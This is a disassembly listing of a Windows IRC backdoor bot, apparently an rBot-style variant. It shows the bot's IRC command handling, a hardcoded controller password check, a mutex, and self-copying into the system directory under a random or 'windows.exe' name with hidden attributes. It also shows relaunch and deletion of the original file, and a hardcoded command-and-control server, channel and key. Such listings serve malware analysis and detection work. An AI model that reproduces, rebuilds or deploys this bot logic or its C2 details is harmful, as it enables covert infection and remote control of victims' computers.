; sub_40274D+3B21�j
mov esi, [ebp+4Ch+var_8]
push esi ; Str
call j__atol
test eax, eax
pop ecx
jle loc_402B92
push esi ; Str
call j__atol
cmp eax, 400h
pop ecx
jge loc_402B92
push offset aQuitLater ; "QUIT :later\r\n"
push esi ; Str
call j__atol
imul eax, 234h
pop ecx
push dword_4444F4[eax] ; int
call sub_4011F5
pop ecx
pop ecx
push 1F4h
call ds:dword_42B014 ; Sleep
push esi ; Str
call j__atol
imul eax, 234h
pop ecx
push dword_4444F4[eax]
call dword_444218 ; closesocket
push [ebp+4Ch+var_1C]
push esi ; Str
call j__atol
imul eax, 234h
pop ecx
push dword_4444FC[eax]
call ds:dword_42B028 ; TerminateThread
push esi ; Str
call j__atol
imul eax, 234h
push esi ; Str
mov dword_4444FC[eax], ebx
call j__atol
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_4442E8[eax], bl
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_409E9F: ; CODE XREF: sub_40274D+3AE2�j
; sub_40274D+3AF7�j
push [ebp+4Ch+var_8] ; Str2
push offset aAll ; "all"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_409ED0
call sub_40AFF6
cmp eax, ebx
jle short loc_409EC6
push eax
push offset unk_42CAFC
jmp loc_407CB2
; ---------------------------------------------------------------------------
loc_409EC6: ; CODE XREF: sub_40274D+776C�j
push offset unk_42CAD4
jmp loc_404A4D
; ---------------------------------------------------------------------------
loc_409ED0: ; CODE XREF: sub_40274D+7763�j
mov esi, [ebp+4Ch+var_20]
jmp short loc_409F3A
; ---------------------------------------------------------------------------
loc_409ED5: ; CODE XREF: sub_40274D+77F1�j
mov edi, [ebp+esi*4+4Ch+Str2]
cmp edi, ebx
jz loc_402B92
push edi ; Str
call j__atol
push eax
call sub_40AF6E
pop ecx
pop ecx
test eax, eax
push edi
lea eax, [ebp+4Ch+Dst]
jz short loc_409F01
push offset unk_42CAB0
jmp short loc_409F06
; ---------------------------------------------------------------------------
loc_409F01: ; CODE XREF: sub_40274D+77AB�j
push offset asc_42CA84 ; "-"
loc_409F06: ; CODE XREF: sub_40274D+77B2�j
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+4Ch+var_C], ebx
jnz short loc_409F2D
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_409F2D: ; CODE XREF: sub_40274D+77C5�j
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
pop ecx
loc_409F3A: ; CODE XREF: sub_40274D+7786�j
inc esi
cmp esi, 20h
jb short loc_409ED5
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_409F45: ; CODE XREF: sub_40274D+3AB8�j
; sub_40274D+3ACD�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8] ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz loc_404979
push esi ; Args
push offset aS_0 ; "%s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push esi
push offset dword_42CA68
jmp short loc_409FD6
; ---------------------------------------------------------------------------
loc_409F7B: ; CODE XREF: sub_40274D+3A8E�j
; sub_40274D+3AA3�j
push [ebp+4Ch+var_8] ; Args
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push [ebp+4Ch+var_8]
push offset unk_42CA44
jmp short loc_409FD6
; ---------------------------------------------------------------------------
loc_409F95: ; CODE XREF: sub_40274D+3A64�j
; sub_40274D+3A79�j
push [ebp+esi+4Ch+Format]
push [ebp+4Ch+var_8] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push [ebp+4Ch+var_8] ; Args
push offset asc_42CA20 ; "-"
loc_409FB1: ; CODE XREF: sub_40274D+6BBA�j
; sub_40274D+6C3D�j ...
call sub_417DE4
loc_409FB6: ; CODE XREF: sub_40274D+22CA�j
add esp, 18h
jmp loc_404979
; ---------------------------------------------------------------------------
loc_409FBE: ; CODE XREF: sub_40274D+3A3A�j
; sub_40274D+3A4F�j
push [ebp+4Ch+var_8] ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push [ebp+4Ch+var_8] ; Args
push offset asc_42C9FC ; "-"
loc_409FD6: ; CODE XREF: sub_40274D+6CE2�j
; sub_40274D+782C�j ...
call sub_417DE4
loc_409FDB: ; CODE XREF: sub_40274D+186F�j
; sub_40274D+6D40�j
add esp, 14h
jmp loc_404979
; ---------------------------------------------------------------------------
loc_409FE3: ; CODE XREF: sub_40274D+2F48�j
; sub_40274D+2F5D�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+Dst]
push offset asc_42C9D8 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
push [ebp+4Ch+var_8] ; Str
call j__atol
add esp, 1Ch
jmp short loc_40A05B
; ---------------------------------------------------------------------------
loc_40A01D: ; CODE XREF: sub_40274D+2F1E�j
; sub_40274D+2F33�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+Dst]
push offset asc_42C9B0 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
push [ebp+4Ch+var_8] ; Str
call j__atol
add esp, 1Ch
imul eax, 3E8h
loc_40A05B: ; CODE XREF: sub_40274D+78CE�j
push eax
call ds:dword_42B014 ; Sleep
jmp loc_404FE6
; ---------------------------------------------------------------------------
loc_40A067: ; CODE XREF: sub_40274D+D65�j
; sub_40274D+D7A�j
push dword ptr [ebp+esi+4Ch+Args] ; Str1
xor eax, eax
cmp [ebp+4Ch+var_8F8], bl
setnz al
push eax ; int
push dword_43C094 ; int
lea eax, [ebp+4Ch+Dest]
push eax ; Dest
call sub_40AB83
lea eax, [ebp+4Ch+Dest]
push eax ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
lea eax, [ebp+4Ch+Dest]
push eax ; Args
push offset asc_42C98C ; "-"
call sub_417DE4
loc_40A0AE: ; CODE XREF: sub_40274D+4FEB�j
add esp, 24h
jmp loc_404979
; ---------------------------------------------------------------------------
loc_40A0B6: ; CODE XREF: sub_40274D+9C9�j
; sub_40274D+9DE�j
mov esi, dword ptr [ebp+esi+4Ch+Args]
cmp esi, ebx
mov [ebp+4Ch+var_8], esi
jz loc_402B92
cmp [ebp+4Ch+var_14], ebx
jnz loc_402B92
push offset Delim ; "!"
push [ebp+4Ch+Str2] ; Str
call _strtok
mov esi, eax
push offset byte_42C988 ; Delim
push ebx ; Str
inc esi
call _strtok
push offset asc_42C984 ; "~"
push eax ; Str
call _strtok
push [ebp+4Ch+var_8] ; Str2
mov edi, eax
push offset aKeke1 ; "keke1"
call _strcmp
add esp, 20h
test eax, eax
jz short loc_40A14F
push edi
lea eax, [ebp+4Ch+var_D0]
push eax
push eax ; Args
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
lea eax, [ebp+4Ch+var_D0]
push eax ; Args
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push edi
push esi
push offset asc_42C904 ; "-"
loc_40A13B: ; CODE XREF: sub_40274D+7A55�j
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
add esp, 30h
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_40A14F: ; CODE XREF: sub_40274D+79BB�j
mov [ebp+4Ch+arg_0], ebx
loc_40A152: ; CODE XREF: sub_40274D+7A22�j
mov eax, [ebp+4Ch+arg_0]
push edi
push off_43C15C[eax]
call sub_40B264
test eax, eax
pop ecx
pop ecx
jnz short loc_40A1A4
add [ebp+4Ch+arg_0], 4
cmp [ebp+4Ch+arg_0], 4
jb short loc_40A152
push edi
lea eax, [ebp+4Ch+var_D0]
push eax
push eax ; Args
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
lea eax, [ebp+4Ch+var_D0]
push eax ; Args
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push edi
push esi
push offset unk_42C8B0
jmp short loc_40A13B
; ---------------------------------------------------------------------------
loc_40A1A4: ; CODE XREF: sub_40274D+7A18�j
mov edi, [ebp+4Ch+Str1]
xor esi, esi
loc_40A1A9: ; CODE XREF: sub_40274D+7A7D�j
cmp [edi], bl
jnz short loc_40A1C0
push [ebp+4Ch+var_8] ; Str2
push offset aKeke1 ; "keke1"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_40A1D1
loc_40A1C0: ; CODE XREF: sub_40274D+7A5E�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_40A1A9
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_40A1D1: ; CODE XREF: sub_40274D+7A71�j
push 7Fh ; Count
lea eax, [ebp+4Ch+var_E38]
shl esi, 7
add esi, [ebp+4Ch+Str1]
push eax ; Source
push esi ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+4Ch+var_C], ebx
jnz short loc_40A205
push ebx ; int
push [ebp+4Ch+var_4] ; int
push offset unk_42C890 ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_40A205: ; CODE XREF: sub_40274D+7A9F�j
lea eax, [ebp+4Ch+var_D0]
push eax ; Args
push offset asc_42C870 ; "-"
loc_40A211: ; CODE XREF: sub_40274D+52F�j
; sub_40274D+2699�j ...
call sub_417DE4
loc_40A216: ; CODE XREF: sub_40274D+19F8�j
pop ecx
loc_40A217: ; CODE XREF: sub_40274D+2338�j
pop ecx
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_40A21D: ; CODE XREF: sub_40274D+1E7�j
; sub_40274D+1FC�j
push [ebp+4Ch+Source] ; Args
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push offset aXI ; "-x+i"
push [ebp+4Ch+Source] ; Args
push offset aModeSS_0 ; "MODE %s %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push [ebp+4Ch+arg_C]
push [ebp+4Ch+arg_8] ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
add esp, 2Ch
mov dword_4D1FDC, edi
jmp loc_40291B
sub_40274D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+186�p
var_984 = byte ptr -984h
var_880 = byte ptr -880h
var_87F = byte ptr -87Fh
Filename = byte ptr -6F0h
var_5F0 = byte ptr -5F0h
Ext = byte ptr -4ECh
SubStr = byte ptr -3ECh
Str = byte ptr -2E8h
Dest = byte ptr -1E4h
var_E0 = dword ptr -0E0h
var_D4 = dword ptr -0D4h
var_B4 = dword ptr -0B4h
var_B0 = word ptr -0B0h
Source = byte ptr -9Ch
Dst = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 984h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], offset sub_40110F
push [ebp+var_4]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_42B038
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_4D1FD0, eax
call esi ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call sub_4012D6
push 2
call dword_4440D4 ; SetErrorMode
push 7530h
push offset aFicken ; "ficken"
push ebx
push ebx
call ds:dword_42B058 ; CreateMutexA
push eax
call ds:dword_42B054 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40A2E2
push 1
jmp loc_40A53C
; ---------------------------------------------------------------------------
loc_40A2E2: ; CODE XREF: WinMain(x,x,x,x)+76�j
lea eax, [ebp+var_880]
push eax
push 202h
call dword_444110 ; WSAStartup
cmp eax, ebx
jnz loc_40A7F7
cmp [ebp+var_880], 2
jnz loc_40A7F1
cmp [ebp+var_87F], 2
jnz loc_40A7F1
mov esi, 104h
push esi
lea eax, [ebp+SubStr]
push eax
call ds:dword_42B010 ; GetSystemDirectoryA
push esi
lea eax, [ebp+Str]
push eax
push ebx
call ds:dword_42B024 ; GetModuleHandleA
push eax
call ds:dword_42B00C ; GetModuleFileNameA
lea eax, [ebp+Ext]
push eax ; Ext
lea eax, [ebp+Filename]
push eax ; Filename
push ebx ; Dir
lea eax, [ebp+Str]
push ebx ; Drive
push eax ; FullPath
call __splitpath
lea eax, [ebp+Ext]
push eax
lea eax, [ebp+Filename]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_5F0]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
lea eax, [ebp+Str]
push eax ; Str
call _strstr
add esp, 30h
test eax, eax
jnz loc_40A542
cmp dword_4D1FD4, ebx
mov esi, offset aWindows_exe ; "windows.exe"
jz short loc_40A3D7
push esi ; Str
xor edi, edi
call _strlen
sub eax, 4
pop ecx
jz short loc_40A3D7
loc_40A3B4: ; CODE XREF: WinMain(x,x,x,x)+172�j
call _rand
push 1Ah
cdq
pop ecx
idiv ecx
push esi ; Str
add dl, 61h
mov byte ptr aWindows_exe[edi], dl ; "windows.exe"
inc edi
call _strlen
sub eax, 4
cmp edi, eax
pop ecx
jb short loc_40A3B4
loc_40A3D7: ; CODE XREF: WinMain(x,x,x,x)+141�j
; WinMain(x,x,x,x)+14F�j
push esi
lea eax, [ebp+SubStr]
push eax
lea eax, [ebp+Dest]
push offset aSS_0 ; "%s\\%s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
call ds:dword_42B050 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40A417
push 80h
lea eax, [ebp+Dest]
push eax
call ds:dword_42B04C ; SetFileAttributesA
loc_40A417: ; CODE XREF: WinMain(x,x,x,x)+1A0�j
mov esi, ds:dword_42B048
xor edi, edi
jmp short loc_40A443
; ---------------------------------------------------------------------------
loc_40A421: ; CODE XREF: WinMain(x,x,x,x)+1F3�j
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_40A458
cmp eax, 20h
jz short loc_40A435
cmp eax, 5
jnz short loc_40A458
loc_40A435: ; CODE XREF: WinMain(x,x,x,x)+1CB�j
xor edi, edi
push 3A98h
inc edi
call ds:dword_42B014 ; Sleep
loc_40A443: ; CODE XREF: WinMain(x,x,x,x)+1BC�j
push ebx
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push eax
call esi ; CopyFileA
test eax, eax
jz short loc_40A421
loc_40A458: ; CODE XREF: WinMain(x,x,x,x)+1C6�j
; WinMain(x,x,x,x)+1D0�j
lea eax, [ebp+Dest]
push eax
call sub_41AE17
pop ecx
push 7
lea eax, [ebp+Dest]
push eax
call ds:dword_42B04C ; SetFileAttributesA
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
push 44h
pop esi
push esi ; Size
lea eax, [ebp+var_E0]
push ebx ; Val
push eax ; Dst
call _memset
mov [ebp+var_E0], esi
xor esi, esi
inc esi
add esp, 18h
mov [ebp+var_D4], offset byte_42B633
mov [ebp+var_B4], esi
mov [ebp+var_B0], bx
call ds:dword_42B044 ; GetCurrentProcessId
push eax
push esi
push 100000h
call ds:dword_42B040 ; OpenProcess
lea ecx, [ebp+Str]
push ecx
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_984]
push offset aSDS ; "%s %d \"%s\""
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+SubStr]
push eax
push ebx
push 28h
push esi
push ebx
push ebx
lea eax, [ebp+var_984]
push eax
lea eax, [ebp+Dest]
push eax
call ds:dword_42B008 ; CreateProcessA
test eax, eax
jz short loc_40A542
push 0C8h
call ds:dword_42B014 ; Sleep
push [ebp+Dst]
mov esi, ds:dword_42B004
call esi ; CloseHandle
push [ebp+var_18]
call esi ; CloseHandle
call dword_444224 ; WSACleanup
push ebx
loc_40A53C: ; CODE XREF: WinMain(x,x,x,x)+7A�j
call ds:dword_42B000 ; ExitProcess
loc_40A542: ; CODE XREF: WinMain(x,x,x,x)+130�j
; WinMain(x,x,x,x)+2B5�j
cmp dword_4E2914, 2
jle short loc_40A58E
mov eax, dword_4E2918
push dword ptr [eax+4] ; Str
call j__atol
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_42B054 ; WaitForSingleObject
push esi
call ds:dword_42B004 ; CloseHandle
mov eax, dword_4E2918
cmp [eax+8], ebx
jz short loc_40A58E
push 7D0h
call ds:dword_42B014 ; Sleep
mov eax, dword_4E2918
push dword ptr [eax+8]
call ds:dword_42B02C ; DeleteFileA
loc_40A58E: ; CODE XREF: WinMain(x,x,x,x)+2E6�j
; WinMain(x,x,x,x)+310�j
cmp dword_43C088, ebx
jz short loc_40A5AB
cmp dword_444274, ebx
jnz short loc_40A5AB
lea eax, [ebp+var_5F0]
push eax ; Str
call sub_401000
pop ecx
loc_40A5AB: ; CODE XREF: WinMain(x,x,x,x)+331�j
; WinMain(x,x,x,x)+339�j
lea eax, [ebp+Source]
push offset asc_42FF24 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push ebx ; int
push eax ; Source
call sub_40AE85
lea eax, [ebp+Source]
push eax
call sub_417D70
push 0B80h ; Size
push ebx ; Val
push offset dword_4D1450 ; Dst
call _memset
lea eax, [ebp+Source]
push offset asc_42FF00 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 1 ; int
push eax ; Source
call sub_40AE85
mov edi, ds:dword_42B03C
add esp, 38h
mov esi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset sub_41C76D
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_4444FC[esi], eax
jnz short loc_40A64B
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_42FEC0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40A64B: ; CODE XREF: WinMain(x,x,x,x)+3CB�j
lea eax, [ebp+Source]
push eax
call sub_417D70
push 2
call sub_40B075
test eax, eax
pop ecx
pop ecx
jnz short loc_40A6D0
lea eax, [ebp+Source]
push offset asc_42FE94 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 2 ; int
push eax ; Source
call sub_40AE85
add esp, 14h
mov esi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push esi
push offset sub_41321D
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_4444FC[esi], eax
jnz short loc_40A6C3
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_42FE60 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40A6C3: ; CODE XREF: WinMain(x,x,x,x)+443�j
lea eax, [ebp+Source]
push eax
call sub_417D70
pop ecx
loc_40A6D0: ; CODE XREF: WinMain(x,x,x,x)+3FF�j
call _rand
push 7Fh ; Count
and eax, 3
push offset aBxi_ath_cx ; "bxi.ath.cx"
push offset byte_4D12EC ; Dest
mov dword_4D1FE0, eax
call _strncpy
mov eax, dword_43C068
push 3Fh ; Count
push offset a_fast_ ; "#.fast.#"
mov edi, offset byte_4D136C
push edi ; Dest
mov dword_4D143C, eax
call _strncpy
push 3Fh ; Count
push offset aRofl1 ; "rofl1"
mov esi, offset byte_4D13AC
push esi ; Dest
call _strncpy
mov dword_4D1440, ebx
loc_40A722: ; CODE XREF: WinMain(x,x,x,x)+53A�j
; WinMain(x,x,x,x)+584�j
add esp, 24h
loc_40A725: ; CODE XREF: WinMain(x,x,x,x)+542�j
mov [ebp+var_4], ebx
loc_40A728: ; CODE XREF: WinMain(x,x,x,x)+4FB�j
push offset dword_4D12E8
mov dword_4D1FDC, ebx
call sub_4025EF
cmp eax, 2
jz loc_40A7EC
cmp dword_4D1FDC, ebx
jz short loc_40A74C
dec [ebp+var_4]
loc_40A74C: ; CODE XREF: WinMain(x,x,x,x)+4E4�j
push 0BB8h
call ds:dword_42B014 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_40A728
cmp [ebp+var_C], ebx
jz short loc_40A79F
push 7Fh ; Count
push offset aBxi_ath_cx ; "bxi.ath.cx"
push offset byte_4D12EC ; Dest
call _strncpy
mov eax, dword_43C068
push 3Fh ; Count
push offset a_fast_ ; "#.fast.#"
push edi ; Dest
mov dword_4D143C, eax
call _strncpy
push 3Fh ; Count
push offset aRofl1 ; "rofl1"
push esi ; Dest
call _strncpy
mov [ebp+var_C], ebx
jmp short loc_40A722
; ---------------------------------------------------------------------------
loc_40A79F: ; CODE XREF: WinMain(x,x,x,x)+500�j
cmp byte_43C0D8, bl
jz loc_40A725
push 7Fh ; Count
push offset byte_43C0D8 ; Source
push offset byte_4D12EC ; Dest
call _strncpy
mov eax, dword_43C06C
push 3Fh ; Count
push offset a_fast__0 ; "#.fast.#"
push edi ; Dest
mov dword_4D143C, eax
call _strncpy
push 3Fh ; Count
push offset aRofl1_0 ; "rofl1"
push esi ; Dest
call _strncpy
mov [ebp+var_C], 1
jmp loc_40A722
; ---------------------------------------------------------------------------
loc_40A7EC: ; CODE XREF: WinMain(x,x,x,x)+4D8�j
call sub_40AFF6
loc_40A7F1: ; CODE XREF: WinMain(x,x,x,x)+A0�j
; WinMain(x,x,x,x)+AD�j
call dword_444224 ; WSACleanup
loc_40A7F7: ; CODE XREF: WinMain(x,x,x,x)+93�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40A800(char *Dest)
sub_40A800 proc near ; CODE XREF: sub_40AB83+4A�p
; DATA XREF: .data:off_43C4B0�o
Dest = dword ptr 4
push esi
push edi
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
call _rand
xor edx, edx
mov ecx, 48Fh
div ecx
mov edi, [esp+0Ch+Dest]
push off_43C518[edx*4]
push offset aS ; "%s"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 14h
cmp dword_43C090, esi
jle short loc_40A867
loc_40A841: ; CODE XREF: sub_40A800+65�j
call _rand
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_43C090
jl short loc_40A841
loc_40A867: ; CODE XREF: sub_40A800+3F�j
mov eax, edi
pop edi
pop esi
retn
sub_40A800 endp
; ---------------------------------------------------------------------------
push esi
push edi
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
mov edi, [esp+10h]
mov dword ptr [esp], offset aNetapi ; "netapi-"
push offset aS ; "%s"
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 10h
loc_40A897: ; DATA XREF: .data:0043F374�o
; .data:0043F3B8�o ...
cmp dword_43C090, esi
jle short loc_40A8C5
loc_40A89F: ; CODE XREF: .text:0040A8C3�j
call _rand
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_43C090
jl short loc_40A89F
loc_40A8C5: ; CODE XREF: .text:0040A89D�j
mov eax, edi
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_40A8CA proc near ; CODE XREF: sub_40274D+66B8�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call _rand
push 3
cdq
pop ecx
idiv ecx
mov ebx, [esp+0Ch+arg_0]
xor edi, edi
mov esi, edx
add esi, dword_43C090
test esi, esi
jle short loc_40A90D
loc_40A8F7: ; CODE XREF: sub_40A8CA+41�j
call _rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40A8F7
loc_40A90D: ; CODE XREF: sub_40A8CA+2B�j
mov byte ptr [edi+ebx], 0
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40A8CA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov dword ptr [ebp-4], 100h
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
lea eax, [ebp-4]
push eax
mov esi, offset aPc ; "PC"
push esi
call ds:dword_42B05C ; GetComputerNameA
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 0Ch
cmp dword_43C090, esi
jle short loc_40A980
loc_40A95A: ; CODE XREF: .text:0040A97E�j
call _rand
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_43C090
jl short loc_40A95A
loc_40A980: ; CODE XREF: .text:0040A958�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
push 0Ah
lea eax, [ebp-0Ch]
push eax
push 7
push 800h
call ds:dword_42B060 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aS_8 ; "%s|"
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_43C090, esi
jle short loc_40A9F5
loc_40A9CF: ; CODE XREF: .text:0040A9F3�j
call _rand
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_43C090
jl short loc_40A9CF
loc_40A9F5: ; CODE XREF: .text:0040A9CD�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-74h]
sub esp, 94h
push esi
push edi
lea eax, [ebp-20h]
push eax
mov esi, offset byte_42B633
mov dword ptr [ebp-20h], 94h
call ds:dword_42B064 ; GetVersionExA
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
cmp dword ptr [ebp-1Ch], 4
pop ecx
jnz short loc_40AA69
cmp dword ptr [ebp-18h], 0
jnz short loc_40AA4F
cmp dword ptr [ebp-10h], 1
jnz short loc_40AA42
mov esi, offset a95 ; "95"
loc_40AA42: ; CODE XREF: .text:0040AA3B�j
cmp dword ptr [ebp-10h], 2
jnz short loc_40AA99
mov esi, offset aNt_0 ; "NT"
jmp short loc_40AA99
; ---------------------------------------------------------------------------
loc_40AA4F: ; CODE XREF: .text:0040AA35�j
cmp dword ptr [ebp-18h], 0Ah
jnz short loc_40AA5C
mov esi, offset a98 ; "98"
jmp short loc_40AA99
; ---------------------------------------------------------------------------
loc_40AA5C: ; CODE XREF: .text:0040AA53�j
cmp dword ptr [ebp-18h], 5Ah
jnz short loc_40AA94
mov esi, offset aMe_0 ; "ME"
jmp short loc_40AA99
; ---------------------------------------------------------------------------
loc_40AA69: ; CODE XREF: .text:0040AA2F�j
cmp dword ptr [ebp-1Ch], 5
jnz short loc_40AA94
cmp dword ptr [ebp-18h], 0
jnz short loc_40AA7C
mov esi, offset a2k ; "2K"
jmp short loc_40AA99
; ---------------------------------------------------------------------------
loc_40AA7C: ; CODE XREF: .text:0040AA73�j
cmp dword ptr [ebp-18h], 1
jnz short loc_40AA89
mov esi, offset aXp_0 ; "XP"
jmp short loc_40AA99
; ---------------------------------------------------------------------------
loc_40AA89: ; CODE XREF: .text:0040AA80�j
cmp dword ptr [ebp-18h], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40AA99
loc_40AA94: ; CODE XREF: .text:0040AA60�j
; .text:0040AA6D�j
mov esi, offset a??? ; "???"
loc_40AA99: ; CODE XREF: .text:0040AA46�j
; .text:0040AA4D�j ...
mov edi, [ebp+7Ch]
push esi
push offset aS_7 ; "[%s]|"
push 1Ch
push edi
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_43C090, esi
jle short loc_40AADD
loc_40AAB7: ; CODE XREF: .text:0040AADB�j
call _rand
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_43C090
jl short loc_40AAB7
